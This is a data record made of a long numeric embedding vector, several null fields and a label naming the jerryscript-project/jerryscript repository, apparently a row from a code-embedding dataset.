0.02074204385280609, -0.006115975324064493, -0.012176192365586758, -0.00006871759978821501, 0.004432775545865297, -0.010928603820502758, -0.0035824631340801716, 0.008914339356124401, -0.003885648213326931, -0.0043595926836133, -0.004317773971706629, -0.02567664161324501, -0.016769273206591606, 0.01407197117805481, 0.018762627616524696, 0.01018980797380209, -0.0322561077773571, -0.004948538728058338, 0.015138345770537853, -0.005450362339615822, -0.011277091689407825, -0.007945540361106396, 0.010663752444088459, 0.004255046136677265, 0.027656057849526405, -0.016908667981624603, 0.0110819386318326, -0.0001012250577332452, 0.026917262002825737, -0.008077966049313545, -0.008280090056359768, 0.007450686767697334, -0.01579350419342518, 0.012817411683499813, -0.02347419410943985, 0.004732475616037846, -0.004770809318870306, 0.00670143635943532, 0.011820734478533268, -0.008823731914162636, -0.021313564851880074, -0.014483187347650528, 0.017034124583005905, -0.006785073783248663, 0.0020595677196979523, -0.015821384266018867, -0.014720159582793713, -0.030193055048584938, 0.020100824534893036, 0.013444690965116024, 0.0217735692858696, 0.005551423877477646, 0.0314754918217659, 0.0025944977533072233, -0.010879815556108952, 0.024143291637301445, 0.008942218497395515, 0.0007623189012520015, 0.019612940028309822, 0.002064795233309269, 0.005467786453664303, 0.003875193651765585, -0.002714726375415921, 0.0035284473560750484, 0.005394604057073593, -0.02142508141696453, -0.014761978760361671, 0.003404733957722783, -0.010161928832530975, 0.019682638347148895, -0.016197752207517624, -0.0038333749398589134, 0.013716512359678745, -0.009548588655889034, 0.0062623405829072, -0.01722927764058113, 0.002263433765619993, -0.007353110238909721, -0.01814928837120533, 0.006893105339258909, 0.0026171496137976646, -0.02171781100332737, 0.018065650016069412, 0.021592356264591217, -0.009165250696241856, -0.02297237142920494, 0.01731291599571705, -0.0002046281733782962, -0.015068648383021355, -0.021912965923547745, 0.003655645763501525, -0.027530601248145103, 0.037887685000896454, -0.004687171895056963, 0.02921728603541851, -0.005356270354241133, -0.020184461027383804, -0.018009891733527184, 0.01294286735355854, 0.012775593437254429, 0.02145295962691307, 0.00139482575468719, -0.0038124655839055777, 0.011918311007320881, 0.006833862047642469, -0.00034674617927521467, 0.003889133222401142, 0.0036173120606690645, -0.015445016324520111, 0.017006244510412216, -0.01597471907734871, -0.020240219309926033, -0.005018236115574837, 0.010566174983978271, -0.004056407604366541, -0.002308737253770232, 0.025160878896713257, 0.0017215338302776217, 0.0016309268539771438, 0.016030477359890938, -0.033427029848098755, 0.017926255241036415, -0.009025855921208858, 0.009813440032303333, -0.006955833174288273, 0.000013218064850661904, 0.0015969491796568036, -0.008196452632546425, 0.01600259728729725, 0.004474594257771969, -0.001055049360729754, 0.020783862099051476, 0.015319560654461384, -0.03590826690196991, -0.014134698547422886, -0.0012763396371155977, -0.0058685485273599625, 0.016462603583931923, 0.00034696399234235287, 0.0320051945745945, 0.00438050227239728, -0.0017711934633553028, 0.017480188980698586, -0.010308293625712395, 0.0018295652698725462, 0.003624281845986843, 0.011339819990098476, -0.002444647718220949, -0.010308293625712395, 0.009367374703288078, -0.0012231951113790274, -0.005046115256845951, 0.00004990466186427511, -0.009241918101906776, 0.015417137183248997, -0.014113789424300194, -0.0037427679635584354, 0.012956807389855385, 0.0018243379890918732, -0.0020334310829639435, 0.02520269714295864, 0.018762627616524696, 0.0027635148726403713, 0.011521033942699432, 0.02541179023683071, -0.015723807737231255, 0.00897009763866663, 0.0016065326053649187, 0.002336616162210703, 0.018915962427854538, -0.007687659002840519, 0.00020920208771713078, -0.005994004663079977, -0.0040912567637860775, 0.008147664368152618, 0.0031729890033602715, 0.020017186179757118, -0.005976580083370209, 0.0036974644754081964, 0.0076388707384467125, -0.0010829283855855465, -0.005506120156496763, 0.0030719272326678038, 0.006269310601055622, -0.007001136429607868, 0.014859555289149284, 0.00877494364976883, 0.00023065591813065112, -0.021759631112217903, -0.006178703624755144, 0.0010820572497323155, -0.0033071571961045265, -0.0031032913830131292, 0.02407359518110752, 0.014120759442448616, 0.005251723807305098, 0.008231301791965961, 0.00453035207465291, 0.007095228414982557, 0.013688633218407631, -0.0043665627017617226, 0.018288683146238327, 0.004338683560490608, 0.005150661803781986, -0.021439021453261375, 0.007610991597175598, -0.006677042227238417, -0.007022046018391848, 0.006614314392209053, 0.0025282849092036486, 0.001195315970107913, 0.011813764460384846, -0.005516575183719397, -0.028478490188717842, 0.008231301791965961, 0.0022477516904473305, 0.002214645268395543, 0.012712865136563778, -0.009917986579239368, -0.0008058799430727959, 0.0071928054094314575, -0.007624931167811155, 0.0004560844972729683, -0.0025875282008200884, 0.03420764580368996, 0.029942143708467484, -0.021202048286795616, -0.00002150828186131548, 0.002029946306720376, 0.010998301208019257, -0.026708168908953667, -0.00418883329257369, -0.0017372157890349627, 0.03362218290567398, -0.002094416646286845, 0.004265500698238611, -0.017745040357112885, 0.003655645763501525, 0.0012327785370871425, -0.020839620381593704, 0.0025317699182778597, -0.007534324191510677, 0.01319377962499857, -0.004965962842106819, 0.004206257872283459, -0.006593404803425074, 0.005119298119097948, 0.000587638933211565, 0.007443717215210199, 0.007673719897866249, 0.03239550441503525, 0.000053661802667193115, -0.02439420484006405, 0.01901353895664215, -0.014009242877364159, -0.0021275230683386326, -0.01752200908958912, 0.018400199711322784, 0.02496572583913803, 0.006230976898223162, 0.01005738228559494, 0.009506769478321075, 0.023042067885398865, -0.003355945460498333, 0.00897009763866663, 0.02166205272078514, 0.007610991597175598, 0.010956482961773872, -0.013110142201185226, 0.020505070686340332, -0.016741393133997917, 0.011137696914374828, 0.022707520052790642, -0.01018980797380209, 0.0036173120606690645, 0.006056732498109341, -0.007910692133009434, 0.021620234474539757, 0.013834998942911625, 0.002195478416979313, -0.005230814218521118, 0.010043442249298096, -0.003997164778411388, 0.0007549134897999465, -0.007039470598101616, 0.009660105220973492, 0.00904676504433155, -0.004972932860255241, 0.003270565764978528, -0.009625256061553955, 0.006774619221687317, -0.015779566019773483, 0.00612991489470005, -0.007220684550702572, -0.027781514450907707, 0.00021257805929053575, 0.01906929723918438, 0.009241918101906776, 0.03660524636507034, 0.0038438295014202595, 0.0012205814709886909, 0.01586320251226425, -0.025481488555669785, -0.019389906898140907, 0.002164114499464631, -0.03663312643766403, -0.015221983194351196, 0.004526867531239986, -0.011939220130443573, -0.009039795026183128, -0.003385567106306553, 0.010141018778085709, -0.021439021453261375, 0.008335848338901997, -0.02507724240422249, 0.017563827335834503, 0.00691052945330739, -0.019375968724489212, 0.0032583686988800764, 0.01767534390091896, -0.010461628437042236, -0.008057056926190853, -0.017717162147164345, -0.0009409193298779428, -0.0091791907325387, -0.00009381967538502067, -0.005502635613083839, -0.028408793732523918, -0.002810560865327716, -0.010454659350216389, 0.009464951232075691, -0.01347954012453556, 0.009945865720510483, -0.008726155385375023, -0.012935898266732693, -0.008015238679945469, 0.01651836186647415, 0.005795366130769253, -0.026819685474038124, 0.024909967556595802, 0.0014775918098166585, -0.004133075010031462, 0.005112328100949526, -0.00789675209671259, -0.008266150020062923, 0.005631576292216778, 0.005509605165570974, 0.013702573254704475, 0.013089233078062534, -0.0174383707344532, -0.008914339356124401, -0.017173519358038902, 0.013758331537246704, 0.002308737253770232, 0.012796502560377121, 0.003620796836912632, 0.012517712078988552, -0.01791231520473957, 0.003375112311914563, -0.014162577688694, 0.0049938419833779335, -0.0049938419833779335, 0.0023435859475284815, -0.019808093085885048, -0.01074041984975338, 0.015054709278047085, -0.0002241217443952337, -0.012238920666277409, -0.01933414861559868, -0.016490481793880463, 0.00731129152700305, -0.01943172700703144, 0.013834998942911625, 0.0148177370429039, -0.026373619213700294, -0.010426780208945274, 0.019529303535819054, -0.01182770449668169, -0.008461304008960724, 0.006230976898223162, 0.01681109145283699, -0.003091094084084034, -0.012705895118415356, -0.028659705072641373, -0.003516250289976597, -0.01237831637263298, 0.0039030727930366993, 0.005701274145394564, 0.008412515744566917, -0.00830099917948246, 0.022860854864120483, 0.008795852772891521, 0.005418998189270496, 0.0003646062396001071, -0.001789489178918302, 0.015180164948105812, -0.025746339932084084, 0.019808093085885048, 0.007112652994692326, 0.022623881697654724, -0.01886020414531231, 0.017619585618376732, -0.015180164948105812, 0.002601467538625002, 0.011911340989172459, -0.015096527524292469, 0.007171895820647478, -0.004732475616037846, -0.01094951294362545, -0.00999465398490429, 0.008015238679945469, 0.0049764178693294525, 0.01639290526509285, 0.021466899663209915, 0.010099200531840324, 0.006659617647528648, -0.006802497897297144, -0.009757681749761105, -0.01177891530096531, 0.005624606739729643, -0.0003920496965292841, -0.011402548290789127, 0.00731129152700305, 0.005042630713433027, -0.0019306270405650139, 0.016267448663711548, -0.007001136429607868, 0.007694629020988941, 0.0005571462097577751, 0.003606857266277075, 0.015180164948105812, -0.03052760474383831, -0.030416088178753853, -0.012489832937717438, 0.006882650312036276, 0.015319560654461384, -0.00992495659738779, -0.010935572907328606, 0.0059696100652217865, -0.002636316465213895, 0.00012534701090771705, 0.01600259728729725, -0.002291312674060464, -0.007478565908968449, -0.010705570690333843, -0.026666350662708282, -0.010503447614610195, -0.022010542452335358, -0.013333175331354141, -0.0030475331004709005, -0.008997976779937744, 0.011444366537034512, -0.030639121308922768, -0.010649812407791615, -0.007478565908968449, -0.0002567925548646599, -0.009771620854735374, 0.0038368599489331245, -0.004610504489392042, -0.0040180739015340805, -0.001475849305279553, -0.020728103816509247, 0.022860854864120483, 0.02457541786134243, -0.003829890163615346, -0.007471596356481314, -0.007889783009886742, 0.027781514450907707, -0.0029935173224657774, -0.019348088651895523, -0.005007781554013491, -0.0067537096329033375, -0.0033263240475207567, -0.0022582062520086765, -0.007624931167811155, -0.013235597871243954, 0.012998625636100769, -0.017535947263240814, -0.02074204385280609, 0.008893430233001709, -0.011005271226167679, 0.0056943041272461414, 0.00315033714286983, -0.01048950757831335, -0.0035458719357848167, 0.005823245272040367, -0.012155283242464066, 0.026610592380166054, -0.0016892986604943871, -0.0039170123636722565, -0.018846265971660614, 0.0030666999518871307, 0.011228303425014019, 0.0024063140153884888, 0.0056141517125070095, -0.042292580008506775, 0.006983712315559387, 0.020309917628765106, 0.005830214824527502, 0.01844201795756817, 0.01817716658115387, 0.00016455198056064546, -0.021076591685414314, -0.013904696330428123, 0.004830052610486746, 0.00010057164035970345, 0.007771296426653862, -0.0024028290063142776, 0.00235055573284626, -0.006614314392209053, 0.003091094084084034, 0.007952510379254818, -0.009332525543868542, -0.02109053172171116, -0.03398461267352104, 0.003260111203417182, 0.007576142903417349, 0.003826405154541135, -0.017689282074570656, -0.010719510726630688, -0.03328763321042061, -0.00015823561989236623, 0.033845216035842896, 0.01163255050778389, -0.012970746494829655, 0.005833699833601713, -0.01812140829861164, -0.00030667000100947917, 0.008119785226881504, 0.001425318536348641, 0.014183487743139267, 0.0033123844768851995, 0.018511716276407242, -0.0017363446531817317, -0.026763927191495895, -0.007150986697524786, 0.026011191308498383, -0.016072295606136322, -0.013451660983264446, -0.017062002792954445, -0.005770971532911062, 0.02552330680191517, 0.0031782162841409445, -0.0018225956009700894, 0.008558880537748337, -0.008558880537748337, -0.04061983525753021, -0.01115860603749752, -0.0022669185418635607, 0.0012423619627952576, 0.014343791641294956, 0.005823245272040367, 0.011061029508709908, -0.016058355569839478, -0.011590732261538506, 0.005492181051522493, -0.013444690965116024, 0.013737421482801437, 0.005436422768980265, -0.013639844954013824, -0.015277741476893425, -0.010001624003052711, 0.010224656201899052, 0.030248813331127167, 0.027056656777858734, 0.008175543509423733, 0.006781588774174452, 0.020686285570263863, -0.017926255241036415, -0.025063302367925644, -0.015375318005681038, 0.00044562984840013087, -0.02829727716743946, -0.010092230513691902, -0.009813440032303333, 0.028422731906175613, -0.018469898030161858, 0.010294354520738125, -0.026666350662708282, 0.008175543509423733, -0.006907044909894466, 0.00998071487993002, 0.019264452159404755, -0.013305296190083027, 0.011639520525932312, -0.007499475497752428, -0.010419810190796852, -0.0006612571887671947, -0.033900972455739975, -0.011346790008246899, 0.01600259728729725, 0.004708081483840942, -0.0070917438715696335, -0.008900399319827557, 0.005415513180196285, 0.02234509028494358, 0.004220197442919016, -0.0022129027638584375, -0.00043169030686840415, -0.013911666348576546, 0.001834792667068541, 0.0144274290651083, 0.016197752207517624, 0.005276117939502001, 0.004965962842106819, 0.0037392829544842243, -0.005851123947650194, 0.009039795026183128, 0.015012890100479126, 0.0143577316775918, -0.01746625080704689, 0.015779566019773483, 0.00959737692028284, 0.011339819990098476, -0.014497127383947372, 0.032088834792375565, -0.004826567601412535, 0.006886135321110487, -0.011904371902346611, -0.020393554121255875, -0.004303834401071072, -0.005276117939502001, -0.0077225081622600555, 0.02005900628864765, -0.008398575708270073, 0.0017084655119106174, 0.0217735692858696, 0.02300024963915348, -0.0016814576229080558, -0.03049972467124462, -0.005380664486438036, 0.00032322321203537285, -0.009088583290576935, -0.004129590466618538, -0.04416047781705856, 0.014985010959208012, -0.002744348021224141, 0.02279115654528141, 0.013054383918642998, -0.0122598297894001, -0.014971071854233742, -0.0034935984294861555, -0.0023557832464575768, -0.009687984362244606, 0.0008982294239103794, -0.012768623419106007, -0.02260994166135788, -0.0030666999518871307, 0.0032531414180994034, -0.012963777408003807, -0.0047289906069636345, 0.019501423463225365, -0.016532300040125847, 0.009869198314845562, -0.013618935830891132, -0.01565410941839218, 0.01725715771317482, -0.004080801736563444, 0.005366724915802479, 0.006363402586430311, 0.008252210915088654, -0.0018922932213172317, -0.000015219152373902034, -0.021146290004253387, 0.007924631237983704, 0.01752200908958912, 0.03482098504900932, 0.010566174983978271, 0.010175867937505245, -0.01524986233562231, 0.010642842389643192, -0.008363727480173111, -0.009339495562016964, 0.0013486510142683983, -0.0008877748041413724, -0.021592356264591217, -0.018163228407502174, -0.013124082237482071, 0.005997489206492901, -0.004049438051879406, -0.005589757580310106, -0.016030477359890938, -0.012322558090090752, -0.028185760602355003, -0.00660385936498642, -0.007736447732895613, 0.0054433923214674, 0.004084286745637655, -0.03192155808210373, 0.0033367786090821028, 0.007185835391283035, 0.016086235642433167, -0.01529168151319027, 0.0013085748068988323, 0.004986872430890799, -0.0032531414180994034, -0.018609292805194855, -0.01734079420566559, -0.005757032427936792, -0.002951698610559106, 0.002709499094635248, 0.022540245205163956, -0.008900399319827557, -0.0008372439187951386, 0.011967099271714687, 0.01927839033305645, 0.011911340989172459, -0.020658405497670174, -0.005398089066147804, -0.0009348207386210561, -0.011967099271714687, 0.023279041051864624, -0.000647753244265914, -0.006858256179839373, 0.005216874647885561, -0.005150661803781986, -0.0034117037430405617, 0.0028680614195764065, 0.008447364903986454, -0.011876492761075497, -0.000974896945990622, 0.019264452159404755, 0.03359430283308029, 0.004153984598815441, -0.0031224582344293594, 0.021787509322166443, -0.0005397217464633286, 0.0026833624579012394, 0.007401898503303528, -0.003364657750353217, -0.015138345770537853, 0.01589108072221279, -0.007084773853421211, -0.00040620705112814903, -0.005701274145394564, -0.006279765162616968, -0.019473545253276825, -0.006046277936547995, 0.0038682238664478064, -0.02811606228351593, -0.027098476886749268, 0.015668049454689026, 0.034709468483924866, -0.005359755363315344, 0.008008268661797047, -0.010712540708482265, 0.003749737748876214, -0.006788558326661587, 0.004237621556967497, -0.0017485417192801833, -0.008809792809188366, 0.003620796836912632, 0.022986309602856636, 0.0025213153567165136, -0.0021763115655630827, -0.006875680759549141, -0.006164764054119587, 0.004596564918756485, -0.013165900483727455, -0.003575493348762393, -0.00704295514151454, 0.005966125521808863, 0.008384636603295803, -0.0025021482724696398, 0.004293379839509726, 0.016267448663711548, -0.012517712078988552, 0.012726805172860622, 0.010294354520738125, 0.01407197117805481, 0.008161603473126888, -0.011702247895300388, -0.02541179023683071, 0.005464301910251379, -0.00557930301874876, 0.000494853884447366, -0.023376617580652237, -0.04215318337082863, -0.009451012127101421, 0.007290382403880358, -0.03289732709527016, -0.014246215112507343, -0.011967099271714687, 0.015528653748333454, 0.03337126970291138, 0.002275630831718445, -0.01710382290184498, -0.012190132401883602, 0.007269472815096378, -0.007478565908968449, -0.01589108072221279, -0.006265825591981411, -0.03415188565850258, 0.006520222406834364, -0.011806794442236423, 0.009897077456116676, -0.022122059017419815, 0.017577767372131348, 0.0010620191460475326, 0.0011866037966683507, -0.0018870659405365586, 0.004781263880431652, 0.009255858138203621, -0.02145295962691307, 0.009527679532766342, 0.0018435048405081034, -0.027865150943398476, 0.0011212622048333287, -0.01975233480334282, -0.006025368347764015, 0.010594054125249386, 0.000029022568924119696, -0.024254808202385902, 0.025969373062253, 0.00016781906015239656, 0.007680689450353384, -0.012796502560377121, 0.012099524959921837, 0.023376617580652237, -0.009855258278548717, -0.018274743109941483, -0.016643816605210304, 0.0015542593318969011, 0.009750711731612682, -0.01675533317029476, 0.0032078379299491644, 0.00432125898078084, 0.012127404101192951, 0.017814738675951958, -0.00003612846921896562, 0.006983712315559387, -0.003704434260725975, -0.004011104349046946, -0.004153984598815441, -0.00022477516904473305, 0.0019097176846116781, 0.012218011543154716, -0.01925051212310791, -0.005753547418862581, -0.01176497619599104, 0.01752200908958912, 0.01636502705514431, 0.02029597759246826, -0.04502473026514053, 0.0018678990891203284, 0.009904046542942524, -0.012176192365586758, 0.0002896811638493091, 0.020783862099051476, 0.003129428019747138, -0.009541618637740612, -0.006903559900820255, -0.005352785345166922, -0.0022791156079620123, 0.008398575708270073, -0.004126105457544327, 0.002336616162210703, 0.014734099619090557, -0.028659705072641373, 0.020365675911307335, 0.008112815208733082, -0.003620796836912632, 0.028938496485352516, 0.0070081064477562904, 0.0006817308603785932, 0.006004459224641323, -0.024979665875434875, -0.010029503144323826, 0.011541943065822124, 0.0051576318219304085, 0.0010019048349931836, -0.023251160979270935, -0.046307168900966644, -0.007206744980067015, -0.0014209623914211988, 0.0025317699182778597, 0.010078291408717632, -0.013493480160832405, 0.005983549635857344, -0.018525656312704086, 0.012008918449282646, 0.016922608017921448, 0.031670648604631424, 0.011493154801428318, -0.004098226316273212, -0.0004761226009577513, 0.024408143013715744, 0.00643309997394681, -0.00864251796156168, -0.01463652215898037, 0.03897496685385704, -0.0014340307097882032, 0.014748038724064827, -0.014566824771463871, -0.005450362339615822, -0.0012885367032140493, 0.009604346938431263, -0.016671696677803993, -0.022777216508984566, -0.006868710741400719, -0.008733125403523445, 0.016378965228796005, -0.022832974791526794, -0.012448013760149479, -0.00961131602525711, 0.010099200531840324, -0.007157956715673208, 0.0025491942651569843, 0.0021832813508808613, 0.004004134330898523, 0.014971071854233742, -0.013200749643146992, -0.0125246811658144, -0.007938571274280548, -0.0032270047813653946, 0.016044417396187782, 0.0020769922994077206, 0.011534973978996277, -0.005913852248340845, -0.013625905849039555, -0.004234137013554573, 0.01054526586085558, 0.005307482089847326, -0.0288548581302166, 0.006199612747877836, -0.021132349967956543, 0.02507724240422249, 0.009834349155426025, 0.00932555552572012, -0.020505070686340332, -0.004439745098352432, 0.005655970424413681, -0.01954324170947075, -0.00030340292141772807, -0.007764326874166727, 0.01906929723918438, 0.028938496485352516, -0.003937921486794949, -0.000660385936498642, 0.01844201795756817, 0.00392049690708518, -0.009123432449996471, -0.018316563218832016, -0.020017186179757118, -0.003990194760262966, -0.023766925558447838, -0.012671046890318394, 0.019891731441020966, 0.009304646402597427, 0.020421434193849564, 0.020519010722637177, 0.02276327833533287, 0.005182025954127312, -0.0013373250840231776, 0.014859555289149284, 0.0038229203782975674, -0.005858093965798616, 0.0071997749619185925, 0.013702573254704475, -0.009701923467218876, -0.007157956715673208, 0.0007035114103928208, -0.017187459394335747, 0.0033367786090821028, -0.005234299227595329, 0.01589108072221279, 0.02168993279337883, -0.00965313520282507, 0.002094416646286845, 0.005551423877477646, 0.011256182566285133, -0.007318261079490185, 0.006088096182793379, 0.00009904699982143939, 0.021355383098125458, 0.0257045216858387, 0.006614314392209053, -0.010357081890106201, -0.003120715729892254, -0.004847476724535227, -0.015751685947179794, 0.00931161642074585, 0.013005595654249191, -0.0047220210544764996, -0.011820734478533268, -0.01281044166535139, 0.030890032649040222, 0.004781263880431652, -0.030750636011362076, -0.0014514551730826497, 0.020156582817435265, 0.00432125898078084, 0.01182770449668169, -0.0017982013523578644, 0.011298001743853092, 0.0218990258872509, 0.015138345770537853, -0.014664401300251484, -0.0025422244798392057, 0.011235273443162441, 0.0035545839928090572, 0.006046277936547995, -0.014343791641294956, 0.0026171496137976646, -0.00687219575047493, -0.0007222426938824356, -0.00523778423666954, -0.013117112219333649, 0.016532300040125847, 0.010273444466292858, -0.015556532889604568, -0.006523707415908575, -0.011597701348364353, -0.002348813461139798, -0.010224656201899052, 0.00851009227335453, -0.011360729113221169, 0.03498825803399086, -0.0063180988654494286, -0.024199049919843674, 0.004349138122051954, 0.0018661565845832229, 0.012845290824770927, -0.00008015238563530147, -0.021397201344370842, -0.006541131529957056, 0.003645191201940179, -0.032953083515167236, -0.004244591575115919, -0.01117254514247179, -0.00961131602525711, -0.006816437467932701, 0.006373857147991657, 0.009255858138203621, -0.01026647537946701, 0.006687496788799763, -0.012629227712750435, 0.014748038724064827, 0.006558556109666824, -0.007248563691973686, -0.006196127738803625, 0.01109587773680687, 0.0033890518825501204, 0.009987683966755867, 0.017326854169368744, -0.01294286735355854, 0.026136647909879684, 0.023850562050938606, -0.006161279045045376, 0.00008783002704149112, -0.019585061818361282, 0.009255858138203621, -0.010426780208945274, 0.013068323954939842, 0.01216922327876091, -0.00938828382641077, -0.010064351372420788, -0.004310804419219494, 0.019835973158478737, -0.010503447614610195, -0.0010724737076088786, -0.011256182566285133, 0.012204071506857872, 0.0015281226951628923, -0.01441348996013403, -0.011541943065822124, -0.002709499094635248, -0.02585785649716854, 0.005021721124649048, -0.010914663784205914, -0.007820084691047668, 0.02237297035753727, 0.008531001396477222, -0.005757032427936792, 0.011611641384661198, 0.011256182566285133, 0.025216637179255486, -0.0217735692858696, -0.003575493348762393, 0.014399549923837185, -0.010552235879004002, -0.01933414861559868, 0.010642842389643192, 0.00031886709621176124, -0.0051576318219304085, 0.003535417141392827, 0.014106819406151772, 0.007952510379254818, 0.012671046890318394, -0.013758331537246704, 0.01047556847333908, -0.002425480866804719, -0.001760738785378635, 0.020923256874084473, 0.03245126083493233, 0.004962478298693895, -0.011897401884198189, -0.0007527354173362255, -0.010705570690333843, -0.021411141380667686, 0.012064676731824875, 0.004607019945979118, -0.014650462195277214, 0.014650462195277214, 0.04508049041032791, 0.004136560019105673, -0.0003829018969554454, 0.007917662151157856, -0.01675533317029476, 0.0038926179986447096, 0.0053318762220442295, -0.0037845864426344633, -0.012608318589627743, 0.0041191354393959045, 0.012280739843845367, -0.005450362339615822, -0.005680364556610584, 0.018065650016069412, 0.008949188515543938, 0.00040097974124364555, 0.010517386719584465, 0.00030884804436936975, 0.017535947263240814, -0.00380898080766201, 0.013779240660369396, 0.02350207418203354, 0.009527679532766342, -0.016267448663711548, -0.0020090369507670403, 0.01594683900475502, 0.005736122839152813, 0.005781426560133696, 0.005589757580310106, 0.020519010722637177, 0.007687659002840519, -0.032060954719781876, -0.031168824061751366, 0.025551186874508858, 0.01109587773680687, -0.004805658012628555, 0.001740700681693852, -0.006046277936547995, -0.0050042965449392796, -0.002388889668509364, 0.005899912677705288, 0.0031067761592566967, -0.03286944702267647, 0.01347954012453556, 0.0007279056590050459, -0.00007476170139852911, 0.006959318183362484, -0.011033150367438793, 0.00843342486768961, 0.0004939826321788132, -0.005032175686210394, 0.018748687580227852, -0.015472895465791225, 0.008057056926190853, -0.02341843582689762, -0.008607668802142143, -0.022233575582504272, -0.003906557336449623, -0.01325650792568922, -0.020672345533967018, -0.015180164948105812, -0.02029597759246826, -0.01906929723918438, 0.003190413350239396, 0.01927839033305645, 0.008663427084684372, -0.023488134145736694, 0.0020595677196979523, -0.005188995506614447, 0.023097826167941093, 0.01148618571460247, -0.008781913667917252, 0.008517062291502953, 0.008684337139129639, 0.01683897152543068, -0.03797132149338722, 0.011716187931597233, 0.027920909225940704, -0.0028227579314261675, 0.022219635546207428, -0.004624444060027599, 0.02234509028494358, 0.00830099917948246, -0.004742930177599192, -0.005143692251294851, -0.011116787791252136, -0.007297351956367493, 0.01699230633676052, 0.015612291172146797, 0.01104011945426464, 0.02231721207499504, -0.02796272747218609, 0.015458955429494381, 0.0004068604903295636, 0.005715213716030121, 0.02056082896888256, 0.014761978760361671, -0.008147664368152618, -0.006328553427010775, 0.0013286129105836153, 0.015821384266018867, -0.004094741307199001, -0.004697626922279596, 0.0028941980563104153, -0.006035822909325361, 0.017089882865548134, 0.00643309997394681, -0.004958993289619684, 0.01182770449668169, 0.0014357732143253088, 0.0027774544432759285, -0.013340144418179989, 0.004394441843032837, 0.006809467915445566, -0.00011380331852706149, 0.004324743989855051, -0.005415513180196285, -0.0361870601773262, -0.028032425791025162, 0.0027478327974677086, -0.0091791907325387, -0.02287479303777218, -0.01916687563061714, 0.007164926268160343, 0.011953160166740417, -0.017926255241036415, 0.0008781913784332573, -0.0007183221750892699, 0.025593005120754242, 0.011681338772177696, -0.01998930796980858, 0.01662987843155861, 0.010022533126175404, 0.00965313520282507, 0.006105520762503147, -0.0038786784280091524, 0.00993889570236206, -0.0032444291282445192, 0.023306919261813164, 0.008266150020062923, -0.004126105457544327, -0.011653459630906582, 0.005216874647885561, -0.015375318005681038, -0.01788443699479103, 0.0014418717473745346, 0.00040773171349428594, 0.01524986233562231, 0.0012345209252089262, 0.004864901304244995, 0.007436747197061777, 0.0007932472508400679, 0.006349463015794754, 0.004080801736563444, 0.0033489756751805544, -0.011277091689407825, 0.0003434790996834636, -0.008565850555896759, -0.0031276855152100325, 0.013828028924763203, 0.047673244029283524, 0.008795852772891521, 0.0040285284630954266, 0.022066300734877586, -0.0066526480950415134, -0.0031224582344293594, -0.012022857554256916, -0.007659780327230692, -0.003054502885788679, 0.008788883686065674, -0.01651836186647415, 0.0013059611665084958, 0.012008918449282646, -0.014009242877364159, -0.008384636603295803, -0.016671696677803993, -0.02237297035753727, 0.0055409693159163, -0.01054526586085558, -0.028227578848600388, -0.008119785226881504, 0.014594703912734985, 0.010433749295771122, 0.002425480866804719, -0.0005026948638260365, 0.004805658012628555, 0.0003643884265329689, -0.012817411683499813, 0.008900399319827557, -0.019417786970734596, 0.02475663274526596, -0.00420974288135767, -0.010782238095998764, -0.0003955345891881734, 0.031698524951934814, -0.003404733957722783, -0.015277741476893425, 0.012211041525006294, -0.01074041984975338, -0.007771296426653862, 0.013674694113433361, -0.014566824771463871, -0.026248164474964142, 0.0043735322542488575, -0.0021170685067772865, -0.0022878278978168964, -0.01319377962499857, 0.0012266800040379167, -0.0059521859511733055, 0.010371021926403046, 0.008454333990812302, 0.033928852528333664, -0.008057056926190853, 0.0146225830540061, -0.018748687580227852, 0.003875193651765585, -0.0031224582344293594, 0.01148618571460247, -0.01975233480334282, 0.024645116180181503, -0.028576068580150604, 0.011033150367438793, 0.01347954012453556, 0.002211160259321332, -0.017173519358038902, 0.015221983194351196, -0.00998071487993002, 0.010294354520738125, -0.0009757681982591748, 0.033399149775505066, -0.002855864353477955, -0.010350112803280354, -0.003704434260725975, -0.01856747455894947, -0.02463117614388466, -0.01764746382832527, 0.009346464648842812, -0.012824381701648235, 0.007875842973589897, -0.0034517799504101276, 0.02460329793393612, -0.005087933968752623, -0.010803147219121456, 0.0034186735283583403, -0.006882650312036276, 0.009820410050451756, -0.02499360404908657, 0.0033785973209887743, -0.0186232328414917, 0.015124406665563583, 0.01681109145283699, 0.02957971580326557, -0.0182329248636961, -0.014929252676665783, 0.022651761770248413, 0.011528003960847855, -0.0076388707384467125, 0.014957131817936897, 0.003455264726653695, -0.008252210915088654, 0.026526954025030136, -0.004255046136677265, -0.004927629139274359, 0.014985010959208012, 0.004049438051879406, 0.0037567075341939926, -0.0011482700938358903, 0.002294797683134675, 0.012434074655175209, -0.0014488415326923132, 0.026847563683986664, 0.009137371554970741, -0.0013033475261181593, -0.002354040741920471, 0.02457541786134243, -0.003840344725176692, -0.013040444813668728, 0.0010681176790967584, 0.019766274839639664, 0.013124082237482071, -0.016295328736305237, -0.015640169382095337, 0.02620634436607361, 0.014260155148804188, -0.03412400558590889, -0.0077294777147471905, -0.012796502560377121, 0.02698696032166481, 0.017145641148090363, 0.000009896532901620958, -0.008517062291502953, 0.001370431506074965, -0.009416162967681885, 0.005000812001526356, -0.009137371554970741, 0.009423132985830307, -0.0073670498095452785, 0.01654624007642269, -0.008684337139129639, 0.003185186069458723, -0.0017877466743811965, 0.05099085718393326, -0.014915313571691513, -0.017424430698156357, -0.01775898039340973, 0.022010542452335358, -0.02258206345140934, 0.016950486227869987, -0.007227654103189707, -0.021118411794304848, 0.018483836203813553, 0.006847801618278027, 0.015556532889604568, -0.010238596238195896, -0.00987616740167141, -0.00466277776286006, 0.0017224050825461745, 0.006659617647528648, 0.0014331594575196505, -0.005418998189270496, 0.007346140220761299, 0.01054526586085558, -0.008384636603295803, 0.007806145586073399, 0.011381639167666435, -0.0018435048405081034, -0.003795041237026453, 0.005798850674182177, 0.007980389520525932, 0.02118810825049877, -0.004167924169450998, -0.007297351956367493, -0.016713514924049377, 0.027349388226866722, 0.0071196225471794605, 0.018748687580227852, 0.005283087491989136, -0.025425730273127556, -0.0030283662490546703, 0.0016439951723441482, 0.014734099619090557, 0.0025666188448667526, -0.030332449823617935, -0.0018138833111152053, 0.003516250289976597, -0.00035023107193410397, -0.009869198314845562, -0.005335360765457153, 0.018246864899992943, 0.029050013050436974, 0.010106170549988747, -0.006809467915445566, 0.0034639770165085793, 0.025927554816007614, -0.01993354968726635, 0.008231301791965961, 0.0009644422680139542, -0.002155402209609747, 0.01319377962499857, -0.023585710674524307, -0.0038926179986447096, 0.0008063155692070723, 0.003840344725176692, 0.028631826862692833 ]
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
